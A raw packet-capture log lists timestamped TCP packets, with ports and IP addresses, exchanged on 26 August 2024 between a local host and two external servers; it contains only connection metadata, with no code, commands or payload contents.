Aug 26, 2024 23:29:27.066147089 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.066158056 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.066195011 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.066246033 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.066287994 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.066298962 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.066314936 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.066330910 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.066452026 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.066514969 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.066559076 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.066570997 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.066606045 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.066621065 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.066632032 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.066643000 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.066653967 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.066669941 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.066684961 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.066837072 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.066883087 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.066890001 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.066900015 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.066929102 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.066940069 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.066971064 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.066986084 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.066997051 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.067013025 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.067014933 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.067028046 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.067028999 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.067042112 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.067059994 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.067068100 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.067079067 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.067089081 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.067121029 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.067693949 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.067703962 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.067714930 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.067747116 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.067749023 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.067754984 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.067759991 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.067771912 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.067785978 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.067805052 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.068036079 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.068047047 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.068057060 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.068083048 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.068106890 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.068111897 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.068118095 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.068130016 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.068140984 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.068151951 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.068155050 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.068176985 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.068197012 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.068614960 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.068629980 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.068640947 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.068651915 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.068672895 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.068676949 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.068686008 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:27.068720102 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:27.079310894 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.084350109 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084359884 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084368944 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084378004 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084394932 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084403992 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084413052 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084422112 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084430933 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.084501982 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.084507942 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084518909 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084528923 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084558010 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.084573984 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.084575891 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084588051 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084595919 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084630966 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.084656000 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.084680080 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084688902 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084697008 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084723949 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084739923 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.084774017 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.084809065 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084819078 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084841967 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084863901 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.084892988 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.084938049 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084953070 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.084989071 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.089370966 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.089387894 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.089432001 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.089469910 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.089513063 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.089572906 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.089596033 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.089647055 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.089690924 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.089720011 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.089875937 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.089884996 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.089925051 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.089955091 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.089984894 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090003967 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.090025902 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.090025902 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090070009 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090109110 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090109110 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.090120077 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090141058 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090151072 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090159893 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090193987 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090204000 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090220928 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090229988 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090285063 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090295076 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090302944 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090322971 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090332031 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090339899 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090348959 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090409040 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090418100 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090445995 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090455055 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090464115 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090472937 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090481997 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090490103 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090507984 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090517044 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090523958 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090533018 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090548992 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090558052 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090565920 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090600967 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090610027 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090617895 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090651035 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090660095 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090702057 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090712070 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090733051 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.090743065 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094357014 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094398975 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094484091 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094494104 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094579935 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094660997 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094671011 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094679117 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094696999 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094706059 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094741106 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094790936 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094799995 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094809055 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094846010 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094855070 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094867945 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094891071 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094935894 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094945908 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094971895 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094980955 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.094990015 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.107780933 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.107870102 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.117860079 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.120902061 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.121035099 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.121045113 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.121104002 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.121151924 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.121160984 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.121169090 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.121257067 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.121265888 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.121320009 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.121329069 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.121375084 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.121383905 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.121417999 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.123783112 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.123882055 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.123891115 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.123898983 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.123909950 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.123919964 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.123936892 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.123948097 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.123956919 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.123971939 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.123980045 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.123987913 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124074936 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124083042 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124090910 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124126911 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124135971 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124144077 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124187946 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124197006 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124224901 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124234915 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124242067 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124300957 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124346018 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124356031 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124460936 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124517918 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124526978 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124543905 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124588966 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124598980 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124634981 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124676943 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124686956 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124722004 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124799967 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124809980 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.124844074 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.134536028 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.171921015 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.172032118 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.172032118 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.172091961 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.176989079 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177046061 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177058935 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177067995 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177097082 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177105904 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177185059 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177194118 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177246094 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177258015 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177288055 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177298069 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177344084 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177352905 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177396059 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177405119 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177467108 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177476883 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177519083 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177527905 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177617073 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177705050 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177714109 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177721024 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177753925 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177803993 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177814007 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177822113 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177839041 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177911043 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177920103 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177927017 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177942991 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.177953959 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178014040 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178024054 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178060055 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178070068 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178173065 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178181887 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178205013 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178270102 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178278923 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178287029 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178344011 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178421974 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178431988 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178438902 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178455114 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178463936 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178518057 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178558111 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178566933 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178580999 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178654909 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178663969 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178705931 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178716898 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178725004 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178740025 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178786039 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178795099 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178848982 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178895950 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.178910017 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178920031 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178927898 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178940058 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178955078 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.178987026 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:27.178992033 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179003000 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179073095 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179105043 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179115057 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179122925 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179218054 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179227114 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:27.179229975 CEST	29257	49728	95.179.163.21	192.168.2.7
